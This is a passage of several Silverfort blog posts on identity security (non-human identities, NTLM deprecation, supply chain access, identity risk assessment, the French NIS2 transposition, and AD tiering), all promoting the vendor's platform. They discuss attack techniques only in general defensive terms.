similar results if we expanded our scope and applied the analysis to other types of NHIs regularly used at organizations globally. The compromise of a single NHI service account could give attackers access to multiple resources, making it an ideal target for attackers — sophisticated or not. And they’ll rarely face much resistance, as standard security controls like traditional MFA can typically only protect human identities.   Coupled with the fact that only one in five organizations is highly confident in preventing identity threats, this paints an alarming picture. Steps to protecting your non-human identities 1. Strive for least privilege: Limit access at the most granular level, especially on privileged non-human accounts, based on source, destination, protocol, time, and other factors. Excessive privileges can lead to unintentional risks in an organization such as data loss or theft, as well as creating more and unnecessary targets for phishing attacks. 2. Define your “normal”: To establish a risk, or what’s deemed abnormal activity in a network, clearly establish a baseline of what “normal” behavior looks like for all identities, both human and non-human. This should be particularly easy for service accounts, whose behavior is highly predictable and repetitive – assuming, of course, you already have visibility into your NHIs. 3. Quickly spot abnormal activity: With the right tools in place to proactively monitor and alert them to these abnormal activities, teams can then respond quickly. This helps identify and prevent any further deviations, and if attackers are trying to break into the network, the security team can efficiently mitigate and contain the scope of their attack . 4. Automatically block atypical service accounts’ access attempts: Detection is not enough. You should also be able to actively block a suspected compromised service account from accomplishing access to the targeted resource. 5. Seek out a tool that extends MFA beyond human identities. MFA is a tried and tested security control that has proven time and again to thwart attackers. By extending MFA to resources that were once unprotectable, you finally conduct a “double check” on every authentication request — even for NHIs. Learn more about how Silverfort can help protect your NHIs. Report Methodology In Silverfort’s Identity Underground Report, we looked at hundreds of thousands of data points across hundreds of customers of different sizes and verticals to determine the scope of the non-human identity problem, with a focus on highly privileged and pervasive Active Directory service accounts. We also conducted research with Osterman Research, which included responses from 637 people in identity roles during May-June 2023. To qualify, respondents had to work at organizations with at least 1,000 employees. The surveys were conducted in six countries, with the surveys in France and Germany fielded in French and German respectively. The survey was cross industry, and no industries were excluded or restricted. --- - Published: 2024-07-30 - Modified: 2024-07-30 - URL: https://www.silverfort.com/blog/ntlm-deprecation-is-giving-us-xp-eol-flashbacks-are-you-protected/ Microsoft recently announced the deprecation of NTLM protocol for Windows client. This falls in line with Microsoft’s encouragement to move away from NTLM due to the security risks it introduces – and acts as a wakeup call that maintaining NTLM usage puts environments at high risk. We cannot overlook the striking resemblance between today’s NTLM deprecation and Windows XP’s EOL a decade ago. In both cases, Microsoft ceased to support a legacy – yet extremely common – infrastructure that exposes its users to critical risks. In the case of XP, the risk was malicious remote code execution; with NTLM it’s credential access and subsequent lateral movement and ransomware spread. This blog provides a summary of the potential identity threats NTLM introduces to organizations today and outlines a mitigation plan to ensure your environment remains resilient. Did you know NTLM is alive and kicking?   While NTLM being ‘insecure’ is common knowledge, it is still heavily used in production environments. The Identity Underground Report, published in March 2024, disclosed that an alarming proportion of users, admins and service accounts still use NTLM for resource access:  64% of user accounts regularly use NTLM for resource access Diagram #1: Breakdown of NTLM authentications by percentage of users 37% of administrator users regularly use NTLM for resource access Diagram #2: Additional breakdown focusing on admin and non-admin users 46% of service accounts regularly use NTLM for resource access Diagram #3: Breakdown of NTLM authentications by percentage of service accounts Did You Know NTLM Can Enable Mass Ransomware Spread? But what is the actual risk of high NTLM usage?   NTLM security issues stem from the way it uses hashes instead of passwords. This eliminates sending the cleartext password over the wire, which is good. However, attackers can abuse this mechanism and use the NTLM hash itself as a password equivalent for malicious resource access. Let’s map this NTLM abuse to MITRE ATT&CK framework terminology:  Credential Access: attackers can employ a wide array of available tools to extract the NTLM either from its storage in machines’ memory or while it traverses the network between machines. Lateral movement: following the hash compromise, attackers can either use the hash itself or decrypt it offline to obtain the cleartext password. In the former case, they would use techniques such as Pass-the-Hash or NTLM relay. In the latter, they would simply use newly obtained passwords for malicious access. The combination of credential access and lateral movement is the X-factor behind all the high-profile ransomware attacks organizations have experienced in recent years.   Knowledge Is Power: Ask the Following Questions to Understand and Resolve Your NTLM Risk Exposure Gain insight into your environment’s NTLM exposure and mitigation capabilities by asking your identity security team the following questions:  Do we have visibility into actual NTLM usage in our environment?   This question focuses on the scope of your NTLM exposure across all users, admins, service accounts, and the resources where NTLM is used. The answer should be quantified as a percentage, like the one we’ve show above. Can we limit NTLM usage to where it is absolutely necessary?   Next step is to see what you can do to minimize NTLM usage. The answer to this question should show the portion of your NTLM usage that cannot be eliminated (legacy apps are the most common example) and the portion that could be removed without any operational disruption. Can we block lateral movement facilitated by NTLM in real time?   Here we should assume a breach has already happened. If NTLM is in place, there’s a solid chance that attackers would compromise passwords and attempt to perform malicious access. The answer to this question should list the security controls in place that can detect and block malicious access attempts using NTLM-related compromised credentials. Conclusion: See, Know and Act to Mitigate NTLM Risks  Like with Windows XP, being proactive is the best approach to mitigate NTLM-driven risks. The three questions above are an outline for a proactive mitigation strategy, so can your identity and security teams provide solid answers to them? Of course, this would depend on the identity and security solutions you have in place. If you can’t find the answers or if they’re dissatisfying, immediate action is required to find the solution that can help. Anything shorter than that would leave you exposed. Remember XP and the multiple attacks organizations experienced on a daily basis? That problem didn’t vanish by itself. NTLM will be no different. --- - Published: 2024-07-23 - Modified: 2024-10-15 - URL: https://www.silverfort.com/blog/identity-security-is-the-key-to-managing-manufacturers-supply-chain-cyber-risk/ What’s the weakest link in a manufacturer’s security architecture? One of the common answers is ‘the one you can’t control’, with third-party access being the most prominent example. Supply chain attacks are one of the hardest challenges security teams struggle with, particularly for manufacturing companies that rely heavily on an ecosystem of external contractors. Their access is crucial for business operations, but is almost completely beyond control of the identity security team.   In this blog we’ll analyze this challenge in detail and shed light on the only spot where security can be enforced: authentication and access. We’ll then uncover how Silverfort’s Unified Identity Security platform can leverage various controls, such as ITDR, MFA, and authentication firewall, to mitigate supply chain risk and ensure third-party access never compromises the organization’s security posture. Supply Chain 101: How to Secure What You Don’t Own The logic behind supply chain attacks is simple. Sometimes, the actual target is just too strong. Instead of wasting time and effort in attacking it directly, adversaries focus on a third party that is trusted by the target organization. Usually, this third party is less resilient to attacks than the main target, otherwise there’s no benefit in going after it in the first place. So, here’s the problem in its most distilled form: by definition, there will always be a third party that is easier to compromise than your own company. Sooner or later, attackers will discover this potential route into your environment. However, your hands are tied – you don’t have any say regarding this third party’s security posture, and you can’t enforce your internal security controls and practices on an environment that is not yours. Supply Chain Attacks Are the Ultimate Sweet Spot for Identity Threats There are various forms of supply chain attacks, but we’ll focus on the ones that involve the identity theft of a trusted third-party contractor or vendor. As previously explained, it is easier for the adversary to compromise the third party’s credentials than attacking your environment directly. And this compromise yields a tremendous return, as it provides the adversary with full access without needing to involve any malicious code, weaponized emails, or phishing. Manufacturers Beware: You Are Highly Exposed to Supply Chain Attacks Manufacturing companies are the natural target for supply chain attacks. The nature of their business entails an extensive supply chain, from inbound raw materials to outbound produced goods, with numerous software vendors that provide continuous support to shopfloor, logistics, finance and business operations. This further complicates the problem because the more third-party entities there are, the greater the chance an attacker will find one that is easily compromised. It could literally be anyone – a small supplier of raw material, a warehousing software vendor, or a retailer that shops for the manufactured product. What Would a Typical Supply Chain Identity Attack Look Like? Let’s take a closer look at the supply chain attack flow.   Part #1: Identify and compromise a vulnerable supply chain member  Adversaries can easily perform the required reconnaissance to get a clear picture of their target’s supply chain ecosystem. Once mapping is done, several potential targets are picked up based on their estimated resilience to compromise and potential access privileges. Gaining initial access to these supply chain members typically employs the standard social engineering/weaponized email/remote code execution flow, enabling attackers to easily obtain a username and password for remote access to the targeted manufacturer. Part #2: Leverage the compromised third-party identity for malicious access  Once credentials are obtained, the attackers can connect to the manufacturer’s environment as the legitimate supply chain member would. It’s important to note that this malicious access doesn’t involve any malware or installation of a backdoor. It simply abuses a legitimate access path, making it extremely hard for the security controls in place to detect that something is wrong. Part #3: Execute the attack’s objective   After access is made, the adversary follows up by executing their initial objective – ransomware, data theft, etc. In most cases they would perform additional lateral movement within the manufacturer’s environment. Protection 101: Place Your Defenses on the First Point You Can Control The main reason for supply chain risk is that you have zero control over the resilience level of your external contractors’ environments. The pragmatic – and realistic – assumption should be that this cannot be changed. It naturally follows that you should set your protection measures at the first line of defense that you do control: the authentication stage. This is the first place where the third party (or the attacker that has compromised it) interacts with your environment, and ideally, this is where you’d need security controls that can detect and block malicious access with compromised credentials. Silverfort Unified Identity Security Platform: Defense-In-Depth Against Supply Chain Attacks Silverfort provides the first Unified Identity Security platform purpose-built to detect and prevent malicious access with compromised credentials by any users to any resource, both on-prem and in the cloud. Silverfort’s platform integrates with the identity infrastructure already in place, offering real-time visibility, risk analysis, and active enforcement over every authentication and access attempt. This technology fuels several identity security modules that operate together to fully mitigate supply chain malicious access risks:  Multi-Factor Authentication: Enforce MFA on any third-party access without agents or proxies  With Silverfort, you can easily apply MFA protection on all of your supply chain ecosystem, significantly reducing the likelihood of malicious access with compromised credentials. This protection applies to the initial access to the manufacturer’s environment, as well as access to any subsequent resources within it. Authentication Firewall: Reduce the supply chain attack surface with least privilege access policies   Silverfort’s Authentication Firewall enables identity security teams to easily segment their environments based on users’ identities. In doing so, third-party contractors can access the resources they need, while being unable to access any other resource. This additional security layer significantly reduces the potential blast radius of successful malicious access. Additionally, if a breach is discovered, the identity teams can applyu a break-glass procedure by blocking all access to resources in a single click. Identity Threat Detection and Response (ITDR): Defense-in-depth against malicious access scenarios  Silverfort’s risk engine continuously analyzes every authentication and access attempt to detect any indication of credential access, privilege escalation or lateral movement. The risk engine can identify a multitude of malicious techniques, such as Pass-the-Hash, Kerberoasting and others, as well as access anomalies that indicate a compromise. This acts as an additional defense layer, so even if an attacker did manage to access the targeted environment, Silverfort ITDR will reveal its presence.   Silverfort ITDR goes far beyond just detection and alerting, and can trigger both MFA or the Authentication Firewall to proactively block any malicious access.   Are You a Manufacturer? Gaining the Upper Hand Against Supply Chain Attacks Is Within Your Reach  Identity security is now more urgent than ever. Compromised credentials are the leading attack vector today, and they play a critical role in any supply chain attack. Regain control over your environment by putting the required identity security layers in place today.   Want to learn more? Reach out to one of our experts to schedule a call.   --- - Published: 2024-07-18 - Modified: 2024-07-18 - URL: https://www.silverfort.com/blog/knowledge-is-power-the-importance-of-identity-risk-assessment/ Over 80% of organizations have experienced an identity-related breach that involved compromised credentials. Compromised credentials are one of the most sought-after weaknesses for attackers to facilitate identity breaches, such as lateral movement and ransomware spread. To determine and resolve their identity weaknesses and exposures, organizations need to conduct an identity risk assessment. In this article, we will examine the key components of an effective identity risk assessment, and discuss how to gain full visibility and insights into your identity security posture with Silverfort. Identity Risks Start with Identity Weaknesses Organizations are struggling with identity threats such as account takeovers, lateral movement and ransomware. According to a recent report by Silverfort and Osterman Research, over 80% of organizations have experienced an identity-related breach that involved compromised credentials, with more than half of these breaches in the past year alone. The continuous success of these attacks implies that there are weak links or security gaps attackers target to compromise credentials, escalate privileges and move laterally. The purpose of an identity risk assessment is to uncover these gaps. For example, a recent report entitled “The Identity Underground” disclosed the most critical and prevalent of these weak links and unveiled some alarming findings, including: Insecure on-prem password sync is a contributing factor to the compromise of SaaS apps in 67% of organizations. 37% of admins use NTLM to authenticate, and a further 7% use NTLMv1. 31% of all users in an organization are service accounts. 7% of regular users have admin-level access privileges without belonging to any admin groups. The above data is only a small sample that illustrates the magnitude of identity threat exposure challenges. Key Elements of Identity Risk Assessment Organizations undertake security risk assessments to gain insights into their weaknesses and exposures. The process of conducting a risk assessment involves the collection and analysis of data. Specifically, this article focuses on identity-related data, such as accounts, authentications, and access privileges. An identity risk assessment typically includes the following components: Identity-Related Data User Account Inventory Full visibility into all user accounts, service accounts, and admin accounts. A detailed inventory will typically include information such as names, descriptions, group memberships, and applications associated with each item. Configurations A comprehensive overview of both on-prem and cloud-based configurations of users and directories. Access Patterns Full visibility into all authentications and access patterns of active users and resources, both on-prem and in the cloud, including service accounts and authentication logs. Risk Analysis Credential Access The MITRE ATT&CK framework defines credential access as the techniques attackers use to steal credentials such as account names and passwords. Credential access techniques include keylogging, credential dumping, and brute force, among others. Newer authentication protocols are designed to prevent such attacks, but older protocols like NTLMv1 have weak encryption, which can be easily brute forced. The identity risk assessment aims to discover these weaknesses that enable attackers to use credential access techniques. Privilege Escalation As outlined in MITRE ATT&CK, privilege escalation consists of techniques attackers use to gain higher-level permissions on a system or network. Even after they have gained initial access to the organization's environment, attackers may still need higher privileges in order to carry out their attack. For this reason, privileged accounts are frequently targeted. Attackers will commonly attempt to take advantage of system weaknesses and misconfigurations; for example, shadow admins, who are regular users that were unknowingly given admin privileges or configuration/reset privileges over admin accounts. Shadow admins can reset passwords of actual admins, but they are regular users in all other aspects. Their anonymity also means they are not subject to the same security controls. Lateral Movement Lateral movement, as defined in the MITRE framework, is the techniques used by attackers to enter and control remote systems. This way, attackers can enter the environment and move undetected from one point to the next until they reach their target. For this reason, attackers are very interested in accounts that lack visibility and protection from existing security solutions. Service accounts, for instance, are difficult to keep track of, are often highly privileged, and cannot be protected by password rotation, which means they can be exploited for lateral movement. Security Coverage Gaps There are accounts and resources that security controls cannot cover, and certain weaknesses that cannot be eliminated. For example, many organizations still use legacy systems which do not natively support MFA. Even attempting to manually implement identity security solutions on each legacy application or server is difficult since tampering with them can result in malfunctions or even process terminations. Next Steps: Following Up on a Risk Assessment Prioritization Different risks pose different threats. To resolve the identified risks effectively, organizations should prioritize them based on their potential impact and probability in order to allocate resources most efficiently. For example, an organization may start with highly privileged accounts, critical applications, and any other factors that it deems necessary. Mitigation Risks can be addressed based on their root cause: misconfigurations, malpractices, and security coverage gaps. Mitigation steps can be taken accordingly in order to reduce these risks and improve the organization's identity security posture; for example: Misconfigurations: Misconfigurations occur when incorrect or unsuitable configurations are applied during user creation, which can result in security weaknesses. Misconfigurations are inevitable, and even more so in larger environments. Shadow admins, for example, are a common misconfiguration. Misconfigurations can be resolved by restoring the proper configurations, for example by removing the excessive privileges granted to a shadow admin. Malpractices: The term malpractice refers to actions taken unintentionally or improperly that can result in substantial weaknesses, such as hybrid service accounts or excessive NTLM authentications. Hybrid service accounts happen when an admin uses a service account for interactive login, or a personal account to automate tasks. In order to resolve such malpractices, it is necessary to ensure that IT and admins adhere to security best practices. Security Coverage Gaps: Accounts and resources not covered by security controls make huge security gaps. These gaps lead to identity risks that are very difficult to resolve. For example, MFA for legacy apps and password rotation for service accounts. Organizations must search for a solution to overcome these risks, or alternatively ensure that the security team closely monitors such users and resources. Identity Risk Assessment with Silverfort Silverfort provides a unified identity security platform that prevents identity threats in real time. This enables organizations to have full visibility into all access attempts, and deny access to resources, regardless of authentication protocol, for all on-prem, cloud, and hybrid identity environments. Through Silverfort's unified identity security platform, organizations can perform a comprehensive identity risk assessment to reveal and mitigate all the security gaps, misconfigurations and malpractices attackers can exploit for credential access, privilege escalation and lateral movement. Identity Security Posture Management (ISPM) Comprehensive visibility into identity threat exposures such as service accounts, shadow admins, and legacy protocols like NTLMv1, among others. This includes monitoring and analyzing authentications, access patterns, and behaviors to gather insights into the organization's identity security posture and provide recommendations on how to remove the risks, such as implementing monitoring solutions and removing excessive permissions of privileged accounts. Authentication Firewall Authentication firewall is a method of controlling user access to resources by enforcing strict access and authentication controls. Silverfort's authentication firewall enables organizations to enforce risk-based policies and identity segmentation to block unauthorized access attempts and ensure users only access the resources they need. No changes to the underlying infrastructure are needed, and the authentication firewall's policies can be implemented quickly and seamlessly. MFA for All Silverfort integrates with Active Directory to forward all access requests to Silverfort, allowing it to enforce MFA verification across all systems in the organization's identity infrastructure, including legacy systems. Service Account Protection Automatic discovery and management of service accounts. Silverfort can detect service accounts by analyzing their behavioral patterns and automatically configure access policies in the event that a compromised service account is detected. To discuss how Silverfort can assist your organization in assessing its identity risk, fill out this form and schedule a meeting with a Silverfort identity security expert. --- - Published: 2024-07-16 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/french-transposition-of-the-nis2-directive/ L’ANSSI travaille depuis plusieurs mois sur la transposition de la directive européenne NIS2 en droit français. Récemment, une première ébauche a circulé sur Internet, initialement mise en ligne par LeMagIT, que plusieurs journaux ont décortiqué. En attendant la publication d’une version définitive, ce document fournit déjà une perspective importante sur l’approche des autorités dans la mise en place de cette nouvelle loi de sécurisation des systèmes d’informations d’entités « importantes » ou « essentielles » en France. Nous proposons dans ce blog d’analyser les règles qui y figurent concernant le domaine de l’identité, à savoir, la gestion et protection des identités, des accès et des annuaires. Les annuaires, « cœur de confiance des systèmes d’informations » Il s’agit du terme employé dans le document en référence aux annuaires de l’entité. Sans surprise pour les spécialistes familiers avec l’ANSSI. L’année dernière, celle-ci avait déjà publié un guide de recommandations sur l’administration de l’annuaire d’Active Directory (AD), précisant dans son introduction que « Lorsque qu’un AD est placé au cœur de l’infrastructure d’un SI (gestions des authentifications, attribution des droits d’accès aux ressources, paramétrage des politiques de sécurité, etc. ) il est alors considéré que le SI repose sur l’AD. Dans ce contexte, une compromission de l’AD conduit souvent à une compromission globale du SI. » Quelques mois plus tard l’Agence Nationale de Santé (ANS) a publié avec des contributions de l’ANSSI le plan d’action CaRE pour les établissements de la santé, selon lequel « l’annuaire technique est le principal moyen de propagation, par lequel les attaquants obtiennent des privilèges élevés, leur permettant d’infliger plus de dégâts ». En effet, même si un attaquant brèche initialement les systèmes d’informations de ses victimes au moyen de vulnérabilités systèmes ou à travers une campagne d’hameçonnage, cette première compromission entraînera rarement des conséquences dramatiques. Le défi pour l’organisation est d’empêcher l’obtention et l’exploitation des identifiants d’utilisateurs à privilèges, permettant de s’infiltrer plus largement dans le système d’information et d’extraire des données sensibles : « Lorsque l’attaquant dispose des droits d’administration sur le cœur de confiance, il est considéré que les systèmes d’information de l’entité sont totalement compromis avec des conséquences pour l’entité pouvant aller jusqu’à la nécessité de reconstruire tout ou une partie de ses systèmes d’information.  » Toute compromission des droits d’administration au système d’information passe nécessairement par les annuaires – principalement Active Directory, mais également Entra ID, Ping, Okta, et ainsi de suite. Dans la version en circulation du document de transposition de la directive NIS2, l’ANSSI exige donc de nombreuses actions visant à durcir la sécurité des comptes d’administration et des annuaires. Savoir quoi protéger L’ANSSI propose ainsi des mesures d’hygiène et de segmentation des systèmes qui sont accessibles et réalisables par toutes les entités concernées, à condition qu’elles y dédient les ressources nécessaires. Les objectifs #4 et #5 mettent notamment en avant le besoin des entités « essentielles » de cartographier dans un premier temps, et auditer régulièrement par la suite, les systèmes d’informations réglementés et l’écosystème de prestataires. Les entités « importantes » sont exemptées de ces contraintes mais doivent néanmoins maintenir une cartographie de leur écosystème, comprenant notamment les fournisseurs contribuant à leurs activités informatiques et la liste des interconnexions avec leurs systèmes internes. Une des difficultés courantes affectant le domaine de l’identité relève justement de la pleine visibilité des différents accès qui nécessitent d’être protégés. Les éléments d’infrastructures les plus anciens, parfois décrits comme « légacy », sont opaques. De même pour les comptes de service et accès machines, dont le recensement, les sources et dépendances ne sont pas toujours entièrement connues. A la fois pour les accès internes et externes, il demeure donc difficile de contrôler et tracer les entrées et activités opérant dans ces ressources. Ces défis se manifestent également dans des scénarios de fusions et d’acquisitions – courants dans certains secteurs désormais couverts par NIS2 – lorsqu’il s’agit d’unifier deux systèmes d’informations distincts sans que les administrateurs en charge de la tâche ne soient parfaitement familiers avec les ressources désormais sous leur responsabilité. Des audits réguliers seront ainsi nécessaires dans le cadre de fusions-acquisitions pour éviter tout risque d’incorporer du « shadow IT », des systèmes non-recensés, dans l’infrastructure d’une entité qui la rendrait non-conforme. L’objectif 7 concernant le patching de vulnérabilités affecte tous les logiciels ou systèmes. Dans le périmètre de l’identité, les principaux coupables seront les organisations utilisant encore des vieilles versions d’Active Directory ou des applications employant des protocoles faibles, notamment du NTLMv1 ou du LDAP non-chiffré. Heureusement, il existe des solutions – certaines gratuites – permettant d'identifier ce type de faiblesses, de les éliminer progressivement ou d’ajouter des contrôles de sécurité tels que l’accès conditionnel ou l’authentification multifacteur. Hygiène et tiering Les articles les plus pertinents sur la sécurisation des identités et des accès interviennent dans les objectifs 9, 10, 13, 14, 15, 16. Ces articles réitèrent des bonnes pratiques déjà bien connues, les rendant obligatoires : désactiver rapidement les comptes d’anciens employés ; changer régulièrement les mots de passe ; respect du principe de moindres privilèges ; éviter les comptes partagés... Dans les objectifs 9, 14, 15, et 16, la segmentation des ressources et des accès en tiers figure de manière importante. L’ANSSI exige l’utilisation exclusive de comptes d’administration pour les actions d’administration, et des mesures assurant « la traçabilité des actions d’administration réalisées ». Elle durcit même davantage ces attentes pour les entités « essentielles », pour lesquelles les actions d’administration doivent être effectués à partir d’un système d’information et de postes de travail dédiés à cet effet. La même dynamique concerne la chaine de sous-traitance, les prestataires et fournisseurs, qui s’authentifient aux systèmes d’informations des entités concernées à travers des accès à distance. Ces accès doivent désormais être protégés par un mécanisme d’authentification monofacteur à minima, et multifacteur pour les entités « essentielles ». Pour les authentifications Active Directory, ces efforts sont particulièrement critiques, puisque ces accès ne bénéficient pas nativement des contrôles courants comme le MFA adaptif ou l’accès conditionnel. Parmi les mesures réalisables sans recours à une plateforme commerciale, par conséquent, ces efforts de cloisonnement et le respect de l’intégrité des Tiers 0 et 1 (pour les organisations qui ont adopté le modèle préconisé par Microsoft) sont en effet essentiels pour fermer la porte aux attaques. Les comptes de service poseront également des problèmes plus importants. Malgré le fait que le document n’y fait pas explicitement référence, les articles concernant les « processus automatiques » dans l’objectif 13 recouvrent certainement ces accès. Toutes les entités devront donc s’assurer que ces comptes soient exclusivement utilisés pour accomplir des fonctions bien définies, et empêcher leur détournement pour accomplir d’autres tâches. Si leurs mots de passe ne peuvent être modifiés régulièrement, il faudra également mettre en œuvre d’autres contrôles d’accès. Des failles et faiblesses inquiétantes Sur certaines questions, on peut se demander pourquoi l’ANSSI ne va pas plus loin dans sa transposition de NIS2. En ce qui concerne le MFA, par exemple, le texte original de la directive européenne exige « l’utilisation d’authentification multifactorielle ou de solutions d’authentification continue dans l’entité, où approprié ». Ces deux derniers mots peuvent forcément mener à des interprétations plus ou moins strictes. L’ébauche actuelle de la transposition française adopte une position peu contraignante. Pour les entités « importantes », aucune clause n’impose le MFA. La mise en place d’un mécanisme d’authentification avec mot de passe suffit pour demeurer conforme. Même dans le cadre de protection des accès privilégiés, on s’étonne de ne pas voir le MFA imposé en plus des exigences de segmentation en tiers et de traçabilité des actions. Une telle mesure aurait été alignée avec l’esprit de la directive européenne et des exigences des cyber assurances. Ce manquement paraît d’autant plus surprenant en ce qui concerne les entités « essentielles », pour lesquelles le MFA n’est exigé que pour les accès distants à travers un système d’information tiers – par exemple, pour les prestataires externes. Qu’en est-il d’autres accès privilégiés, par exemple, pour protéger les ouvertures de session de comptes d’administrateurs de domaine ? Selon Microsoft, le MFA peut bloquer 99,9% des attaques – pourquoi ne pas imposer plus fermement son application dans nos structures critiques ? La version actuelle se veut clairement réaliste et accessible. Dans une dizaine de cas, l’ANSSI envisage donc des mesures alternatives « lorsque des raisons techniques ou opérationnelles ne permettent pas » la mise en œuvre de la directive initialement envisagée. Ainsi une organisation qui ne peut, par exemple, mettre en place le MFA sur les accès distants (objectif 9), changer les mots de passe (objectif 13), créer des comptes individuels pour les utilisateurs ou les tâches automatiques (objectif 13), ou réaliser des actions d’administration à partir d’un compte d’administration (objectif 14) peut néanmoins demeurer conforme à condition de trouver d’autres moyens de mitiger les risques associés. Il est évident que certaines de ces directives peuvent s’avérer techniquement difficiles, voire parfois impossibles. Malheureusement, de nombreuses organisations prennent ce type de règlementations à la légère – il s’agit simplement de cocher des cases plutôt que de réduire véritablement les risques d’attaques. Le nombre d’exceptions ou de dérogations possibles paraît donc surprenant, et risque de laisser la porte ouverte à de futures attaques au sein d’entités moins scrupuleuses. Il est donc dommage que l’ANSSI n’ait pas décidé de durcir davantage certaines de ces exigences. Conclusion On se réjouit de voir cette première ébauche prendre forme plusieurs mois avant la date butoir imposée par la directive européenne. Cela donnera aux organisations concernées une première idée des projets à prioriser. Il est évident que les mesures imposées, notamment pour les entités « essentielles », contribueront à moderniser et durcir la sécurité autour des infrastructures critiques. Dans un contexte géopolitique toujours plus incertain, la France et l’Europe doivent impérativement se prémunir contre les menaces d’attaques débilitantes. D’autant plus que certains organismes à l’échelle nationale, notamment dans le secteur public, ont un niveau de maturité cybersécurité alarmant. Heureusement, plusieurs sociétés et organisations ont déjà proactivement pris des mesures se conformant aux attentes du document circulé par l’ANSSI. Les participants aux Assises de la Cybersécurité ces dernières années auront, par exemple, constaté un grand nombre de participants mettant déjà en œuvre au sein de leurs structures de projets de tiering et bastion. Même si ces exemples sont plus courants au sein du secteur privé que public, on peut espérer que les retours d’expérience et l’expertise ainsi accumulée profitera à l’ensemble des infrastructures du pays. Comment Silverfort peut aider à la mise en conformité NIS2 ? Silverfort peut aider à la mise en conformité avec ces directives. En 1 mois à peine, et sans nécessiter de modifications lourdes dans votre infrastructure, notre plateforme peut : Objectif 5 :Recenser rapidement l’ensemble des accès et privilèges au sein des annuaires, y compris les sources et dépendances de chaque authentification Effectuer un recensement complet des comptes de service et comptes hybrides Objectif 9 : Identifier rapidement les comptes à privilèges préalable à la segmentation en zones de sécurité Objectif 10 : Protéger vos accès distants (RDP, RDS, SSH, PowerShell, PsExec, WMI) avec une solution MFA de votre choix (compatible avec Microsoft Authenticator, Ping, Duo, Okta, clés Yubico ou autres jetons FIDO2) Objectif 13 :Identifier les comptes possédant des privilèges excessifs, les accès employant des vieux mots de passeAlerter ou bloquer toute tentative d’accès en provenance d’un compte de service qui dévie de son comportement habituel Journaliser les accès dans l’intégralité des annuaires Objectifs 14 et 15 :Etendre le MFA à l’ouverture de session sur les postes de travail d’administrateursAlerter ou bloquer les tentatives d’accès qui ne respectent pas les règles de segmentation par tiers, par exemple, entre le tier 1 et le tier 0 Alerter ou bloquer les tentatives de contournement de bastion, par exemple, par l’intermédiaire d’un compte de service Objectif 16 : Journaliser les authentifications d’humains et de machines dans l’intégralité des annuaires, comprenant leurs sources et destinations Pour en savoir plus sur la façon dont Silverfort peut vous aider à relever vos défis en matière de sécurité de l'identité, demandez une démo ici. --- - Published: 2024-07-11 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/ad-tiering-protecting-admin-access-to-tiers-1-and-2/ As the identity attack surface continues to evolve with new methods of compromising organizations, the need to secure an organization's Active Directory (AD) becomes increasingly important. While Active Directory tiering is a fundamental practice to segregate and protect high-privilege accounts, yet many organizations overlook its importance, leaving them vulnerable to malicious actors. Implementing stringent security controls for access groups is essential to prevent unauthorized access and lateral movement within the network. In this blog, we will explore the essentials of AD tiering, and common protection challenges, and discuss how Silverfort protection capabilities help organizations overcome these challenges, making the protection of AD tiering simpler and more efficient.   Common Challenges to Extend Access Controls Beyond Tier 0 Once an Active Directory Tiering project has reached the implementation phase, typically native controls (Active Directory group policies with logon restrictions) and/or Authentication Policy Silos are used to lock down access to Tier 0 (Domain Controllers, PKI online signing CA, Entra Connect / AD FS), which will then be managed exclusively from dedicated admin consoles, the Privilege Access Workstations.   However, for various reasons, organizations often struggle to extend this approach to Tier 1 – where usually 98% of all admin accounts and privileged service accounts reside. As a result, we often get asked by prospective customers how we can help them implement effective access controls beyond Tier 0. The following are the main challenges that most organizations experience when they try to extend secure authentication and access controls to Tier 1 and Tier 2: GPOs (Group Policy Objects) Do Not Scale The large number of distinct access control permutations required for each combination of role (app owner, database admin, backup, etc. ), resource (application name) and environment (dev/test/staging/prod), necessitate such a large number of GPOs that its implementation and operation would become too complex to manage successfully to implement least privilege inside Tier 1.   Centrally Defined Logon Restrictions, but Locally Applied Logon restrictions – being the most common method to implement access controls, are centrally defined and stored in the SYSVOL file share, downloaded to each computer with a group policy mapper and applied locally. This approach has several drawbacks:  Users or processes with administrator privileges on a system can change/disable/modify user logon restrictions for other accounts. Issues parsing group policies can lead to non-application of logon restrictions. To detect issues when applying the policies or attempts to bypass them (e. g. using ntrights. exe or Carbon), monitoring for local configuration changes on each system is required as well as centralized reporting of any notifications of non-compliance. Separate Access Controls for Non-windows Active Directory Assets A sizable footprint of non-Windows infrastructure that is somehow integrated with Active Directory; whether *NIX systems joined using some form of AD-bridging, applications and appliances that rely on LDAP, Kerberos or NTLM authentications with AD – often using a service account rather than a machine identity and don’t process any or only few group policies. These devices, applications and appliances need their own access controls, typically locally defined and tied to AD group membership.   These resources each require a dedicated configuration for access controls and monitoring for compliance.   Microsoft Authentication Policy Silos – No Panacea To overcome the issues associated with access controls locally applied on each piece of the infrastructure, Microsoft proposes Authentication Policy Silos. These can be effective to centrally manage and enforce authentication borders to accounts and assets and are evaluated by the domain controller for each authentication. While a great method to lock down Tier 0, their lack of flexibility tends to prevent rollout on Tier 1 which results in assets (resources and accounts) only being part of a single authentication policy silo at a time. Oftentimes, different groups of privileged users need access to different sets of systems, which can be part overlapping which does not fit with Authentication Policy Silos.   To use Authentication Policy Silos, Kerberos Armoring (FAST) needs to be enabled. Not all existing tools, notably some Privileged Access Management / Bastion-type solutions are compatible with Kerberos Armoring. After the implementation of effective access controls in Tier 0, rollout to other tiers often stalls due to one or more of the above challenges encountered by IT staff, which up until now were very hard to work around. Let's discuss some of the things Silverfort can do to extend the implementation of access controls and MFA beyond Tier 0.   How Silverfort Helps with AD Tiering Silverfort can enhance Active Directory (AD) tiering by offering extensive visibility and control over user access across the organization. It continuously monitors authentication and access activities, assigning risk indicators and scores to users and machines based on their behavior patterns, and checks if the authentication context matches any Silverfort authentication policies. If there’s a match, the policy defines whether to allow the authentication, pause the authentication to enforce MFA, or blocks the authentication, much like a traffic light for your Active Directory authentications. This process helps identify and manage access to high-risk or high-value assets, which is crucial for AD tiering. Additionally, Silverfort's integration with Azure AD provides further insights into user behavior and risk, supporting the implementation of an effective AD tiering strategy.   Let’s see exactly how this is done in Silverfort’s console:  Protection  Silverfort policies extend the concept of conditional access controls to Active Directory, allowing control over who can authenticate where as well as the authentication assurance level (whether MFA is required, as well as the accepted authentication type during the secondary authentication step), based on the user context enriched with its own risk engine as well as any risk perceived by third party risk engines such as part of EDR, XDR and cloud identity silos, and are centrally enforced at the domain controller.   Here are some example Silverfort authentication policies that can help with the implementation of an AD Tiering model:  Block interactive logon 